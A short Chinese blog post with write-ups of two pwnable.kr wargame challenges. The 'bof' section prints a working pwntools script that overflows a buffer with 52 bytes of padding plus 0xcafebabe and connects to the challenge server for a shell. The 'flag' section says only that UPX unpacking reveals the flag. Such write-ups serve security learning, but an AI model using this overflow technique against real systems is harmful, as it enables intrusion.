pwnable.kr第二天

3、bof

这题就是简单的数组越界覆盖,直接用gdb 

调试出偏移就ok

from pwn import *
context.log_level='debug'
payload='A'*52+p32(0xcafebabe)
print payload
turn=True
if turn:
    p=remote('pwnable.kr',9000)
else:
    p=process('./bof')
p.sendline(payload)
p.interactive()

4、flag

这道题。。。严重坑,没想到是upx 加壳。。。呜呜·····

最后还是无意中看到了 upx这个字样。。。然后果断 upx.exe ..然后flag就出来了。

猜你喜欢

转载自www.cnblogs.com/liyuechan/p/10902825.html